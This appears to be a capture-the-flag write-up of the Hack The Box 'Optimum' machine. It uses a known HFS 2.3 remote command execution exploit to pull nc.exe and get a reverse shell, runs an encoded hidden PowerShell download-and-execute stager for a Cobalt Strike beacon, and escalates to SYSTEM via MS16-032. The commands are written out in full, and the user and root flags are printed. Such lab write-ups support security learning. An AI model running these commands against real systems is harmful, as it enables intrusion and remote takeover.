Optimum is a Windows machine, with an average difficulty rating of “piece of cake”.

HttpFileServer RCE

After an nmap scan we see that port 80 is open, running HttpFileServer version 2.3.

➜  Optimum nmap -n -A 10.10.10.8 -oA nmap
PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /

A quick search in EDB shows that there are a few exploits available.

➜  Optimum searchsploit "http file server" 2.3
----------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
 Exploit Title                                                                                                                                             |  Path
                                                                                                                                                           | (/usr/share/exploitdb/platforms/)
----------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload                                                                                             | multiple/remote/30850.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)                                                                                        | windows/remote/34668.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)                                                                                        | windows/remote/39161.py
Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution                                                                                   | windows/webapps/34852.txt
----------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------

39161 looks promising so copy it to the current working directory, using searchsploit with the -m option.

➜  Optimum searchsploit -m 39161
➜  Optimum vim 39161.py 

The basic premise of this exploit is that it sends a specific HTTP request to the application, which causes it to download nc.exe from a web server we control and then executes it to send us a shell.

We have to modify it to work with our IP address, which is on line 35: ip_addr = "192.168.44.128". In my case, this needs to be 10.10.14.5.

We also need to copy nc.exe and start a web service.

➜  Optimum cp /usr/share/windows-binaries/nc.exe .

➜  Optimum python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

Next, we setup our listener to receive the reverse shell.

➜  Optimum nc -lnvp 443
listening on [any] 443 ...

Then run the exploit.

➜  Optimum python 39161.py 10.10.10.8 80

All being well, you will see some GETs for netcat.

10.10.10.8 - - [28/Oct/2017 12:18:39] "GET /nc.exe HTTP/1.1" 200 -
10.10.10.8 - - [28/Oct/2017 12:18:39] "GET /nc.exe HTTP/1.1" 200 -
10.10.10.8 - - [28/Oct/2017 12:18:39] "GET /nc.exe HTTP/1.1" 200 -
10.10.10.8 - - [28/Oct/2017 12:18:39] "GET /nc.exe HTTP/1.1" 200 -

And receive a shell.

connect to [10.10.14.5] from (UNKNOWN) [10.10.10.8] 49204
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\kostas\Desktop>

User Flag

C:\Users\kostas\Desktop>type user.txt.txt
type user.txt.txt
d0c39409d7b994a9a1389ebf38ef5f73

Priv Esc

To make post-exploitation easier, I prefer to spawn a Cobalt Strike Beacon. The following powershell one-liner will run a stager. start /B will background the job - if you don’t do this PowerShell will hang the shell and ctrl+c will kill netcat, forcing you to exploit all over again.

C:\Users\kostas\Desktop>start /B powershell.exe -nop -w hidden -enc aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwAxADAALgAxADAALgAxADQALgA1AC8AYQAiACkAKQA=
*** initial beacon from [email protected] (OPTIMUM)

set pro is a quick way to see if we’re running on 32-bit or 64-bit Windows.

beacon> shell set pro

PROCESSOR_ARCHITECTURE=x86
PROCESSOR_ARCHITEW6432=AMD64
PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 79 Stepping 1, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=4f01
ProgramData=C:\ProgramData
ProgramFiles=C:\Program Files (x86)
ProgramFiles(x86)=C:\Program Files (x86)
ProgramW6432=C:\Program Files
PROMPT=$P$G

I’m going to use my Sherlock script to look for missing MS patches, but that currently needs to run in a 64-bit process (if you’re on a 64-bit OS of course).

beacon> spawn x64 smb

Now, we can load the script into memory and run the Find-AllVulns function.

beacon> powershell-import D:\Tools\Sherlock\Sherlock.ps1
beacon> powershell Find-AllVulns

Title      : Secondary Logon Handle
MSBulletin : MS16-032
CVEID      : 2016-0099
Link       : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable

Title      : Win32k Elevation of Privilege
MSBulletin : MS16-135
CVEID      : 2016-7255
Link       : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/Sample-Exploits/MS16-135
VulnStatus : Appears Vulnerable

Sherlock comes back with two missing patches. MS16-032 is a particular favourite of mine, so let’s aim for that one. This exploits a race-condition which requires the host to have at least 2 CPU cores - Sherlock doesn’t currently validate this requirement, so we must check manually.

beacon> shell wmic cpu get NumberOfCores, NumberOfLogicalProcessors /Format:List

NumberOfCores=2
NumberOfLogicalProcessors=2

Looks good - let’s run the exploit.

I have the exploit integrated into Cobalt Strike via Aggressor Script, which makes this easy :)

beacon> elevate ms16-032 smb

[+] established link to child beacon: 10.10.10.8
[+] received output:
     __ __ ___ ___   ___     ___ ___ ___ 
    |  V  |  _|_  | |  _|___|   |_  |_  |
    |     |_  |_| |_| . |___| | |_  |  _|
    |_|_|_|___|_____|___|   |___|___|___|
                                        
                   [by b33f -> @FuzzySec]

[!] Holy handle leak Batman, we have a SYSTEM shell!!

Root Flag

beacon> shell type C:\Users\Administrator\Desktop\root.txt
51ed1b36553c8461f4552c2e92b3eeed